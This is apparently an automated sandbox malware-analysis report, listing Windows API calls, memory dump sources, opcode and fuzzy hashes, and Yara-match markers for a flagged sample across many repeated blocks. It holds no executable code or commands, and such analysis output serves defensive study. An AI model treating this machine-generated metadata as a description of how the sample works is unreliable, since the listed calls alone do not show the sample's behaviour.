                                                                            • Opcode ID: 1c849bc8349cd8f16be4bf93941b5d8a36ac3d1ba7fab1dfde309d2d3957dc2a
                                                                            • Instruction ID: 586ede14555035fdb23765380f74bdfde5fe2f9e3c0e4589e23a68e39c478078
                                                                            • Opcode Fuzzy Hash: 1c849bc8349cd8f16be4bf93941b5d8a36ac3d1ba7fab1dfde309d2d3957dc2a
                                                                            • Instruction Fuzzy Hash: 682174717002449BCF0CCB58D59AB7CBBB5FBE4309F9541ADD046AF6A1CB749981CB50
                                                                            APIs
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction ID: f102f96a47342219026b223771e1f0861f0c3d6a1c9584b97a7b247a5a393c74
                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction Fuzzy Hash: ED11403240118AFBCF125E85CC45CEE3F62BB1C394B598425FA1859831D73BC9B1AB81
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007DC887
                                                                            • CloseHandle.KERNEL32(?), ref: 007DC898
                                                                            • CloseHandle.KERNEL32(?), ref: 007DC8A5
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC8BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocalObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2545295749-0
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E15F6
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E163E
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E1953
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E1977
                                                                            • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 007E19A8
                                                                            • shutdown.WS2_32(?,00000002), ref: 007E19D1
                                                                            • closesocket.WS2_32(?), ref: 007E19E5
                                                                            • CloseHandle.KERNEL32(?), ref: 007E19F6
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1D0F
                                                                            • closesocket.WS2_32(00000000), ref: 007E1D23
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1D52
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1D7D
                                                                            • closesocket.WS2_32(00000000), ref: 007E1D8A
                                                                            • LocalFree.KERNEL32(?), ref: 007E1D9E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$closesocketshutdown$CloseHandle$EnumEventsFreeLocalNetwork
                                                                            • String ID:
                                                                            • API String ID: 3044467104-0
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E163E
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E1678
                                                                            • WaitForMultipleObjects.KERNEL32(00000006,?,00000000,000000FF), ref: 007E18CE
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1D0F
                                                                            • closesocket.WS2_32(00000000), ref: 007E1D23
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1D52
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1D7D
                                                                            • closesocket.WS2_32(00000000), ref: 007E1D8A
                                                                            • LocalFree.KERNEL32(?), ref: 007E1D9E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wait$ObjectSingleclosesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                            • String ID:
                                                                            • API String ID: 785092289-0
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000,?,007DBE5B), ref: 007C21F2
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE5B), ref: 007C220A
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE5B), ref: 007C2217
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE5B), ref: 007C2236
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2857295742-0
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000,?,007DBE60), ref: 007C42C2
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE60), ref: 007C42DA
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE60), ref: 007C42E7
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE60), ref: 007C4306
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2857295742-0
                                                                            APIs
                                                                              • Part of subcall function 007E39FB: __getptd.LIBCMT ref: 007E3A01
                                                                              • Part of subcall function 007E39FB: __getptd.LIBCMT ref: 007E3A11
                                                                            • __getptd.LIBCMT ref: 007E779A
                                                                              • Part of subcall function 007E81BE: __getptd_noexit.LIBCMT ref: 007E81C1
                                                                              • Part of subcall function 007E81BE: __amsg_exit.LIBCMT ref: 007E81CE
                                                                            • __getptd.LIBCMT ref: 007E77A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                            • String ID: csm
                                                                            • API String ID: 803148776-1018135373
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9C80
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9C8A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D9C96
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9CA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9C80
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9C8A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D9C96
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9CA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9C80
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9C8A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D9C96
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D9CA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            • Opcode ID: d059d293a5f4277054cba504ed0b072ec5b69a6ef6509c42c1f1447392cd145d
                                                                            • Instruction ID: 79ea19b0abd62a29e31350db101b34eed8354291cf22d5dc0758269089885d28
                                                                            • Opcode Fuzzy Hash: d059d293a5f4277054cba504ed0b072ec5b69a6ef6509c42c1f1447392cd145d
                                                                            • Instruction Fuzzy Hash: AE016B75A10204DFCB54DFF4E98895EBBB5BF89301F104A94F60AAB314CA359D40DF60
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DB928
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB93D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB95D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB97D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocal
                                                                            • String ID:
                                                                            • API String ID: 2513001865-0
                                                                            • Opcode ID: 2fedb1619d8d00bb4cc7a18a1119d5d7ce9065acb6467173064a1283124ecfa1
                                                                            • Instruction ID: a0e6d0d32426c319febc2d76b944b92adf305f7e7689c126071d4da8809d89f3
                                                                            • Opcode Fuzzy Hash: 2fedb1619d8d00bb4cc7a18a1119d5d7ce9065acb6467173064a1283124ecfa1
                                                                            • Instruction Fuzzy Hash: 2EF0ED7A504300CBD7248F65F99C7A97BB5B788306F40891AE651833B0EB7D9C45DF1A
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DB928
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB93D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB95D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB97D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocal
                                                                            • String ID:
                                                                            • API String ID: 2513001865-0
                                                                            • Opcode ID: 112ba1709935c093586dfbca4190ce575b0b510c462851b4168415d56ffd2e22
                                                                            • Instruction ID: a0e6d0d32426c319febc2d76b944b92adf305f7e7689c126071d4da8809d89f3
                                                                            • Opcode Fuzzy Hash: 112ba1709935c093586dfbca4190ce575b0b510c462851b4168415d56ffd2e22
                                                                            • Instruction Fuzzy Hash: 2EF0ED7A504300CBD7248F65F99C7A97BB5B788306F40891AE651833B0EB7D9C45DF1A
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DB928
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB93D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB95D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB97D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocal
                                                                            • String ID:
                                                                            • API String ID: 2513001865-0
                                                                            • Opcode ID: 43ce3372ce40c81838ed99e1ba9a64d970a8b1daaf7116df588e90ca41ec0c07
                                                                            • Instruction ID: a0e6d0d32426c319febc2d76b944b92adf305f7e7689c126071d4da8809d89f3
                                                                            • Opcode Fuzzy Hash: 43ce3372ce40c81838ed99e1ba9a64d970a8b1daaf7116df588e90ca41ec0c07
                                                                            • Instruction Fuzzy Hash: 2EF0ED7A504300CBD7248F65F99C7A97BB5B788306F40891AE651833B0EB7D9C45DF1A
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DA140
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DA14A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DA156
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DA160
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            • Opcode ID: c0bc630278bfb44363c3b26884e823321708b2214cab602f07e7d18dc910a7e2
                                                                            • Instruction ID: 05e2b3e32781f1395a2035d14edd967490831cb01c74b922307753028d1c0aaa
                                                                            • Opcode Fuzzy Hash: c0bc630278bfb44363c3b26884e823321708b2214cab602f07e7d18dc910a7e2
                                                                            • Instruction Fuzzy Hash: 94F067B9A00218DFCB14DFF4ED8895EBB79BF89311F104A54B946AB314CA359940DF21
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: 0d769211def397f3ec687323cbd790fbc663fbc8b3409a1ee9723e69f038d17b
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: 0d769211def397f3ec687323cbd790fbc663fbc8b3409a1ee9723e69f038d17b
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: b629f6e0c4872d05758b8ebbc59787866df275030e91d5ea7518e554fc846bea
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: b629f6e0c4872d05758b8ebbc59787866df275030e91d5ea7518e554fc846bea
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: dbb9ebb9385cb75b267210b513ec2e4ac33cee73448c97feb1498ed53892ab43
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: dbb9ebb9385cb75b267210b513ec2e4ac33cee73448c97feb1498ed53892ab43
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: d99d72bbdbd1a6c202a60f3e06c9ff4ca5c41cbe7eff3069d494279afbb5c1f7
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: d99d72bbdbd1a6c202a60f3e06c9ff4ca5c41cbe7eff3069d494279afbb5c1f7
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: acfc30a595d0c6c82b629928c7c7a5afc1616c7ea5efca8e5bb25cc82afb785c
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: acfc30a595d0c6c82b629928c7c7a5afc1616c7ea5efca8e5bb25cc82afb785c
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: f4f092a12180f03273565b925e7259407fb646c8154647fdc4f0b1db42820dbf
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: f4f092a12180f03273565b925e7259407fb646c8154647fdc4f0b1db42820dbf
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: 1a8946de11445935ea63eaabc6e056f2bd847ccc988e784513ea85004bdbce15
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: 1a8946de11445935ea63eaabc6e056f2bd847ccc988e784513ea85004bdbce15
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: 55cd75594e6b85e7379b23ad3d0ee57b8c1ae8d359bb54a2b595eb00efd99fb3
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: 55cd75594e6b85e7379b23ad3d0ee57b8c1ae8d359bb54a2b595eb00efd99fb3
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseFreeHandleLocal
                                                                            • String ID:
                                                                            • API String ID: 836400252-0
                                                                            • Opcode ID: a1c46e657230a21ce4d3777e94104d4b49b6525eefdcab40f8175a789aa5d5a7
                                                                            • Instruction ID: 6bb361f14ddffa44d0d7d83f180eb9acc520a5045b931e1bc1ab261faa6091e6
                                                                            • Opcode Fuzzy Hash: a1c46e657230a21ce4d3777e94104d4b49b6525eefdcab40f8175a789aa5d5a7
                                                                            • Instruction Fuzzy Hash: 7AF0F835901504DBD7148BA4EC4DF6ABBB5BBC4701F848D2CE101B65A0C779A8C0CF50
                                                                            APIs
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Memory Dump Source
